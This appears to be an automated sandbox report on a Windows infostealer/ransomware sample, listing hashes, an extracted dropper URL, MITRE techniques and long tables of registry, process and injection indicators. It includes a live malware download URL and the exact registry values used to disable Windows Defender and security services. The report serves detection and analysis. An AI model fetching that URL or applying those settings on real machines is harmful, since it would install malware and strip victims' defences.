7bd1800901f644312525102786765942f63e164618b076d1e9c7d77e8c055e19

Analysis

max time kernel
138s
max time network
141s
platform
windows10_x64
resource
win10-en-20210920
submitted
28-10-2021 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hgty.bin.exe
Size

1.6MB
MD5

97b1b0eb2864514c1bd17dc2479fd392
SHA1

1e0db2c33bac2abf8cf5883f779b0fb34e63d7c7
SHA256

7bd1800901f644312525102786765942f63e164618b076d1e9c7d77e8c055e19
SHA512

c1940f8b49298f37e2fe23f2ac1fdb35144f09f77d4d58da96f748c78bac2f56f0b90dc19faf02c1a8d3d9992a1b34bb2d2c7c7ec71eab304151c3c843edbc59

Score

10^/10

discovery evasion persistence ransomware spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xuiklxus.xyz/hfile.bin

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

18 364 powershell.exe
Downloads MZ/PE file

flow	pid	process
18	364	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

hgty.bin.tmp7za.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exeeDbwCBj.exeNemica.exe.com

pid	process
3628	hgty.bin.tmp
1760	7za.exe
3852	kernel32.exe
1452	kernel32.exe
1288	kernel32.exe
2496	kernel32.exe
1300	kernel32.exe
1584	kernel32.exe
328	kernel32.exe
192	kernel32.exe
2308	kernel32.exe
2244	kernel32.exe
4012	kernel32.exe
3632	kernel32.exe
2744	kernel32.exe
1516	kernel32.exe
3580	kernel32.exe
1732	kernel32.exe
1020	kernel32.exe
2224	kernel32.exe
660	kernel32.exe
1876	kernel32.exe
3584	kernel32.exe
876	kernel32.exe
1456	kernel32.exe
360	kernel32.exe
1616	kernel32.exe
1980	kernel32.exe
2296	kernel32.exe
2376	kernel32.exe
2636	kernel32.exe
2320	kernel32.exe
1604
2208	kernel32.exe
916	kernel32.exe
688	kernel32.exe
2744	kernel32.exe
1608	kernel32.exe
1516	kernel32.exe
3924	kernel32.exe
3940	kernel32.exe
1416	kernel32.exe
2176	kernel32.exe
3592	kernel32.exe
3604	kernel32.exe
1264	kernel32.exe
2080	kernel32.exe
2020	kernel32.exe
4080	kernel32.exe
3284	kernel32.exe
2812	7za.exe
3768	7za.exe
2928	7za.exe
1252	7za.exe
3424	7za.exe
3772	7za.exe
3756	7za.exe
1400	7za.exe
4012	7za.exe
1884	7za.exe
200	7za.exe
1676	7za.exe
408	eDbwCBj.exe
3792	Nemica.exe.com

Loads dropped DLL 1 IoCs

Processes:

hgty.bin.tmp

pid process

3628 hgty.bin.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

eDbwCBj.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	eDbwCBj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	eDbwCBj.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of SetThreadContext 1 IoCs

Processes:

Nemica.exe.com

description pid process target process

PID 2868 set thread context of 2564 2868 Nemica.exe.com RegAsm.exe
Drops file in Program Files directory 1 IoCs

Processes:

hgty.bin.tmp

description ioc process

File created C:\Program Files (x86)\is-12QT7.tmp hgty.bin.tmp
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1036 timeout.exe
3252 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

3420 bitsadmin.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3100 vssadmin.exe

description	pid	process	target process
PID 2868 set thread context of 2564	2868	Nemica.exe.com	RegAsm.exe

description	ioc	process
File created	C:\Program Files (x86)\is-12QT7.tmp	hgty.bin.tmp

pid	process
1036	timeout.exe
3252	timeout.exe

pid	process
3420	bitsadmin.exe

pid	process
3100	vssadmin.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

kernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	kernel32.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
3792	PING.EXE
3228	PING.EXE
1184	PING.EXE
1500	PING.EXE
3924	PING.EXE
2404	PING.EXE
3192	PING.EXE
1304	PING.EXE
2060	PING.EXE
3500	PING.EXE
1616	PING.EXE
1092	PING.EXE
1452	PING.EXE
188	PING.EXE
3584	PING.EXE
2224	PING.EXE
200	PING.EXE
824	PING.EXE
3492	PING.EXE
4040	PING.EXE
184	PING.EXE
1604	PING.EXE
1452	PING.EXE
1220	PING.EXE
3116	PING.EXE
3080	PING.EXE
3092	PING.EXE
1220	PING.EXE
4076	PING.EXE
1304	PING.EXE
3940	PING.EXE
2380	PING.EXE
1032	PING.EXE
1992	PING.EXE
2420	PING.EXE
1512	PING.EXE
1348	PING.EXE
324	PING.EXE
2744	PING.EXE
4076	PING.EXE
2084	PING.EXE
3424	PING.EXE
3500	PING.EXE
2564	PING.EXE
2032	PING.EXE
2648	PING.EXE
3772	PING.EXE
824	PING.EXE
1040	PING.EXE
188	PING.EXE
1040	PING.EXE
3020	PING.EXE
3416	PING.EXE
3484	PING.EXE
1720	PING.EXE
1264	PING.EXE
628	PING.EXE
2564	PING.EXE
1084	PING.EXE
2376	PING.EXE
364	PING.EXE
1608	PING.EXE
628	PING.EXE
2336	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

hgty.bin.tmppowershell.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exereg.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe

pid	process
3628	hgty.bin.tmp
3628	hgty.bin.tmp
364	powershell.exe
364	powershell.exe
364	powershell.exe
3852	kernel32.exe
3852	kernel32.exe
3852	kernel32.exe
3852	kernel32.exe
1452	kernel32.exe
1452	kernel32.exe
1288	kernel32.exe
1288	kernel32.exe
1452	kernel32.exe
1452	kernel32.exe
1288	kernel32.exe
1288	kernel32.exe
1300	kernel32.exe
1300	kernel32.exe
1300	kernel32.exe
1300	kernel32.exe
1584	kernel32.exe
1584	kernel32.exe
1584	kernel32.exe
1584	kernel32.exe
192	kernel32.exe
192	kernel32.exe
192	kernel32.exe
192	kernel32.exe
2308	kernel32.exe
2308	kernel32.exe
2308	kernel32.exe
2308	kernel32.exe
4012	kernel32.exe
4012	kernel32.exe
4012	kernel32.exe
4012	kernel32.exe
3632	reg.exe
3632	reg.exe
3632	reg.exe
3632	reg.exe
1516	kernel32.exe
1516	kernel32.exe
1516	kernel32.exe
1516	kernel32.exe
3580	kernel32.exe
3580	kernel32.exe
3580	kernel32.exe
3580	kernel32.exe
1020	kernel32.exe
1020	kernel32.exe
1020	kernel32.exe
1020	kernel32.exe
2224	kernel32.exe
2224	kernel32.exe
2224	kernel32.exe
2224	kernel32.exe
1876	kernel32.exe
1876	kernel32.exe
1876	kernel32.exe
1876	kernel32.exe
3584	kernel32.exe
3584	kernel32.exe
3584	kernel32.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

636

pid	process
636

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exereg.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe

description	pid	process
Token: SeDebugPrivilege	364	powershell.exe
Token: SeDebugPrivilege	3852	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	3852	kernel32.exe
Token: SeIncreaseQuotaPrivilege	3852	kernel32.exe
Token: 0	3852	kernel32.exe
Token: SeDebugPrivilege	1452	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1452	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1452	kernel32.exe
Token: SeDebugPrivilege	1288	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1288	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1288	kernel32.exe
Token: 0	1288	kernel32.exe
Token: SeDebugPrivilege	1300	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1300	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1300	kernel32.exe
Token: SeDebugPrivilege	1584	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1584	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1584	kernel32.exe
Token: 0	1584	kernel32.exe
Token: SeDebugPrivilege	192	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	192	kernel32.exe
Token: SeIncreaseQuotaPrivilege	192	kernel32.exe
Token: SeDebugPrivilege	2308	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	2308	kernel32.exe
Token: SeIncreaseQuotaPrivilege	2308	kernel32.exe
Token: 0	2308	kernel32.exe
Token: SeDebugPrivilege	4012	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	4012	kernel32.exe
Token: SeIncreaseQuotaPrivilege	4012	kernel32.exe
Token: SeDebugPrivilege	3632	reg.exe
Token: SeAssignPrimaryTokenPrivilege	3632	reg.exe
Token: SeIncreaseQuotaPrivilege	3632	reg.exe
Token: 0	3632	reg.exe
Token: SeDebugPrivilege	1516	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1516	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1516	kernel32.exe
Token: SeDebugPrivilege	3580	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	3580	kernel32.exe
Token: SeIncreaseQuotaPrivilege	3580	kernel32.exe
Token: 0	3580	kernel32.exe
Token: SeDebugPrivilege	1020	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1020	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1020	kernel32.exe
Token: SeDebugPrivilege	2224	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	2224	kernel32.exe
Token: SeIncreaseQuotaPrivilege	2224	kernel32.exe
Token: 0	2224	kernel32.exe
Token: SeDebugPrivilege	1876	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1876	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1876	kernel32.exe
Token: SeDebugPrivilege	3584	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	3584	kernel32.exe
Token: SeIncreaseQuotaPrivilege	3584	kernel32.exe
Token: 0	3584	kernel32.exe
Token: SeDebugPrivilege	1456	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1456	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1456	kernel32.exe
Token: SeDebugPrivilege	360	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	360	kernel32.exe
Token: SeIncreaseQuotaPrivilege	360	kernel32.exe
Token: 0	360	kernel32.exe
Token: SeDebugPrivilege	1980	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1980	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1980	kernel32.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

hgty.bin.tmpNemica.exe.comNemica.exe.com

pid process

3628 hgty.bin.tmp
3792 Nemica.exe.com
3792 Nemica.exe.com
3792 Nemica.exe.com
2868 Nemica.exe.com
2868 Nemica.exe.com
2868 Nemica.exe.com
Suspicious use of SendNotifyMessage 6 IoCs

Processes:

Nemica.exe.comNemica.exe.com

pid process

3792 Nemica.exe.com
3792 Nemica.exe.com
3792 Nemica.exe.com
2868 Nemica.exe.com
2868 Nemica.exe.com
2868 Nemica.exe.com

pid	process
3792	Nemica.exe.com
3792	Nemica.exe.com
3792	Nemica.exe.com
2868	Nemica.exe.com
2868	Nemica.exe.com
2868	Nemica.exe.com

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

hgty.bin.exehgty.bin.tmpcmd.execmd.exewlanext32.exe

description	pid	process	target process
PID 2784 wrote to memory of 3628	2784	hgty.bin.exe	hgty.bin.tmp
PID 2784 wrote to memory of 3628	2784	hgty.bin.exe	hgty.bin.tmp
PID 2784 wrote to memory of 3628	2784	hgty.bin.exe	hgty.bin.tmp
PID 3628 wrote to memory of 592	3628	hgty.bin.tmp	cmd.exe
PID 3628 wrote to memory of 592	3628	hgty.bin.tmp	cmd.exe
PID 3628 wrote to memory of 592	3628	hgty.bin.tmp	cmd.exe
PID 3628 wrote to memory of 820	3628	hgty.bin.tmp	cmd.exe
PID 3628 wrote to memory of 820	3628	hgty.bin.tmp	cmd.exe
PID 3628 wrote to memory of 820	3628	hgty.bin.tmp	cmd.exe
PID 592 wrote to memory of 3420	592	cmd.exe	bitsadmin.exe
PID 592 wrote to memory of 3420	592	cmd.exe	bitsadmin.exe
PID 592 wrote to memory of 3420	592	cmd.exe	bitsadmin.exe
PID 820 wrote to memory of 364	820	cmd.exe	powershell.exe
PID 820 wrote to memory of 364	820	cmd.exe	powershell.exe
PID 820 wrote to memory of 364	820	cmd.exe	powershell.exe
PID 592 wrote to memory of 1684	592	cmd.exe	wlanext32.exe
PID 592 wrote to memory of 1684	592	cmd.exe	wlanext32.exe
PID 592 wrote to memory of 1872	592	cmd.exe	attrib.exe
PID 592 wrote to memory of 1872	592	cmd.exe	attrib.exe
PID 592 wrote to memory of 1872	592	cmd.exe	attrib.exe
PID 1684 wrote to memory of 2880	1684	wlanext32.exe	cmd.exe
PID 1684 wrote to memory of 2880	1684	wlanext32.exe	cmd.exe
PID 592 wrote to memory of 188	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 188	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 188	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3500	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3500	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3500	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1148	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1148	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1148	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1452	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1452	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1452	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3676	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3676	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3676	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3940	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3940	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 3940	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 412	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 412	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 412	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1040	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1040	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1040	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 2564	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 2564	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 2564	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1296	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1296	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1296	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1468	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1468	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1468	592	cmd.exe	PING.EXE
PID 592 wrote to memory of 1616	592	cmd.exe	PING.EXE
